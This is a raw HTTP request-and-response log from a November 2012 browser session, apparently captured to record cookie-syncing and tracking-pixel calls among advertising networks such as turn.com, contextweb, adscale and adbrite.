User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: i=a225a48e-a153-423d-a356-3d4eb5da3116; expires=Wed, 19-Nov-2014 04:17:41 GMT; path=/; domain=.openx.net
Location: /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=4608069794370173199&amp;cc=1
Content-Length: 0
Connection: close
GET /r/pu?&pid=4&tuid=4608069794370173199 HTTP/1.1

Host: turn.nexac.com
GET /r/pu?&amp;pid=4&amp;tuid=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:40 GMT
GET /imp?anmember=514&anprice=40&Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0585.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=1b3kbie0a/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 19 Nov 2012 04:17:41 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /adscale-ih/tpui?tpid=30&tpuid=4608069794370173199 HTTP/1.1

Host: ih.adscale.de
GET /adscale-ih/tpui?tpid=30&amp;tpuid=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uu=421681350344862462
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: CP=NOI PSA OUR
Expires: Mon, 19 Nov 2012 04:17:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 49
Connection: keep-alive
Set-Cookie: tu=1#586382335#30~4608069794370173199~15663; Expires=Wed, 19-Dec-2012 04:17:41 GMT uu=421681350344862462; Domain=.adscale.de; Expires=Sat, 16-Nov-2013 20:44:21 GMT; Path=/ VAR=LgQWOo0P1j2gslKq85nuDO1O8HFrL50T; path=/; domain=ih.adscale.de DCID=node26; path=/; domain=ih.adscale.de
GET /r/bd?ddc=1&pid=54&cver=1&uid=5858721859426781856 HTTP/1.1

Host: r.turn.com
GET /r/bd?ddc=1&amp;pid=54&amp;cver=1&amp;uid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=4608069794370173199; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7Cundefined%7C15663; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069794370173199; Domain=.turn.com; Expires=Sat, 18-May-2013 04:17:41 GMT; Path=/
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:41 GMT
GET /AdJugTracking/Tracker.aspx?EXCOOKIE_RTB/CacheBuster=111299241&AdJugAgencyId=5626&AdJugCurrencyId=1&ExternalUserGUID=4608069794370173199 HTTP/1.1

Host: tracking.adjug.com
GET /AdJugTracking/Tracker.aspx?EXCOOKIE_RTB/CacheBuster=111299241&amp;AdJugAgencyId=5626&amp;AdJugCurrencyId=1&amp;ExternalUserGUID=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:15:09 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=&quot;http://tracking.adjug.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR LAW CUR ADM TAI PSA PSD IVA IVD HIS OUR SAM OTR LEG UNI COM NAV DEM CNT LOC&quot;
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache, no-cache
Set-Cookie: AJEAUDs=5626=4608069794370173199; domain=adjug.com; expires=Sun, 19-Nov-2017 04:15:09 GMT; path=/ AJUserGUID=3a33756f-77f1-490d-aa3a-8b55b169807e; domain=adjug.com; expires=Sun, 19-Nov-2017 04:15:09 GMT; path=/
Cache-Control: no-cache
Expires: -1
Content-Length: 43
GET /r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&google_cver=1 HTTP/1.1

Host: r.turn.com
GET /r/cms/id/0/ddc/1/pid/18/uid/?google_gid=CAESED7yEyqvwHaZ756lIOe7tfw&amp;google_cver=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=4608069794370173199; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7Cundefined%7C15663; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069794370173199; Domain=.turn.com; Expires=Sat, 18-May-2013 04:17:41 GMT; Path=/
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:40 GMT
GET /adserver/vdi/742697?d=4608069794370173199 HTTP/1.1

Host: ads.adbrite.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Encoding: gzip
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref=&quot;http://files.adbrite.com/w3c/p3p.xml&quot;,CP=&quot;NOI PSA PSD OUR IND UNI NAV DEM STA OTC&quot;
Server: XPEHb/1.2
Set-Cookie: Apache=&quot;168362182x0.561+1353298661x1330937395&quot;; path=/; domain=.adbrite.com; expires=Sun, 14-Nov-2032 04:17:41 GMT rb2=CiQKBjc0MjY5Nxi5xZD-xAEiEzQ2MDgwNjk3OTQzNzAxNzMxOTkQAQ; path=/; domain=.adbrite.com; expires=Sun, 17-Feb-2013 04:17:41 GMT
Content-Length: 59
GET /match?publisher_dsp_id=4&external_user_id=4608069794370173199 HTTP/1.1

Host: ad.360yield.com
GET /match?publisher_dsp_id=4&amp;external_user_id=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; um=!42,CiFwYWVicWNXYTlLZzR1a3N6QjZoRE1qUGtURVNTNUw3UTA#,1413416862
HTTP/1.1 200 OK

Content-Type: image/gif
Set-Cookie: tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; path=/; expires=Mon, 19-Nov-2012 04:17:42 GMT; domain=ad.360yield.com
tuuid=5913710b-d826-4b7c-96b6-9295f2788b78; path=/; expires=Wed, 19-Nov-2014 04:17:41 GMT
um=!4,ChM0NjA4MDY5Nzk0MzcwMTczMTk5,1416370661!42,CiFwYWVicWNXYTlLZzR1a3N6QjZoRE1qUGtURVNTNUw3UTA#,1413416862; path=/; expires=Wed, 19-Nov-2014 04:17:41 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:41 GMT
GET /bh/rtset?do=add&pid=535039&ev=89666ae3-c1ef-41a0-bdf0-7a374e556a82 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535039&amp;ev=89666ae3-c1ef-41a0-bdf0-7a374e556a82 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353298658421|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-195-35-223
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:41 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039.89666ae3-c1ef-41a0-bdf0-7a374e556a82.0.0.1353298661701|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:41 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /bh/rtset?do=add&pid=535461&ev=4608069794370173199 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=535461&amp;ev=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0; pb_rtb_ev=2-535461..0.0.1353298658421|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-39-63-138
Date: Mon, 19 Nov 2012 04:17:40 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:41 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:41 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /adserver/vdi/1113874?d=4608069794370173199 HTTP/1.1

Host: ads.adbrite.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Encoding: gzip
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref=&quot;http://files.adbrite.com/w3c/p3p.xml&quot;,CP=&quot;NOI PSA PSD OUR IND UNI NAV DEM STA OTC&quot;
Server: XPEHb/1.2
Set-Cookie: Apache=&quot;168362116x0.61+1353298661x-2016183788&quot;; path=/; domain=.adbrite.com; expires=Sun, 14-Nov-2032 04:17:41 GMT rb2=CiUKBzExMTM4NzQY6sWQ_sQBIhM0NjA4MDY5Nzk0MzcwMTczMTk5EAE; path=/; domain=.adbrite.com; expires=Sun, 17-Feb-2013 04:17:41 GMT
Content-Length: 59
GET /merge?pid=1&3pid=4608069794370173199 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=1&amp;3pid=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D; expires=Tue, 19-Nov-2013 04:17:41 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:41 GMT
Connection: close
GET /TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66901&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=32092403&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/GetAd.aspx?tagver=1&amp;cp=520266&amp;ct=66901&amp;cn=1&amp;crtg=&amp;cwod=&amp;epid=&amp;esid=&amp;ifurl=&amp;tppg=&amp;cf=300X250&amp;rq=1&amp;dw=300&amp;cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;cwr=&amp;mrnd=32092403&amp;if=1&amp;tl=-1&amp;pxy=&amp;cxy=&amp;dxy=&amp;tz=-60&amp;ln=en-US HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=1; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739..0.0.1353298658421|537583..0.0.1353298658421|547259..0.0.1353298658421
HTTP/1.1 200 OK

Content-Type: application/x-javascript;charset=utf-8
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
CW-Server: LGA-APP215
Content-Encoding: gzip
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 915
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: 66901_300X250__POSUNKNOWNXUNKNOWN=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770; Domain=.contextweb.com; Expires=Mon, 19-Nov-2012 04:19:56 GMT; Path=/ vf=2; Domain=.contextweb.com; Expires=Mon, 19-Nov-2012 05:00:00 GMT; Path=/
GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4608069794370173199 HTTP/1.1

Host: ad.afy11.net
GET /ad?mode=7&amp;publisher_dsp_id=2&amp;external_user_id=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.0 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate, proxy-revalidate
Expires: Sat, 1 Jan 2000 01:01:00 GMT
Last-Modified: Sat, 1 Jan 2000 01:01:00 GMT
Pragma: no-cache
Server: AdifyServer
Content-Length: 45
Set-Cookie: a=Vg24EM9f20qPgsiGu3MTtQ; path=/; expires=Wed, 19-Nov-2014 04:17:41 GMT; domain=afy11.net; s=1,2*50a9b2e5*Rm2gHB8CQL*wYqw07CZqhw9yEWrEuiXfMXcRQ==*; path=/; expires=Wed, 19-Nov-2014 04:17:41 GMT; domain=afy11.net;
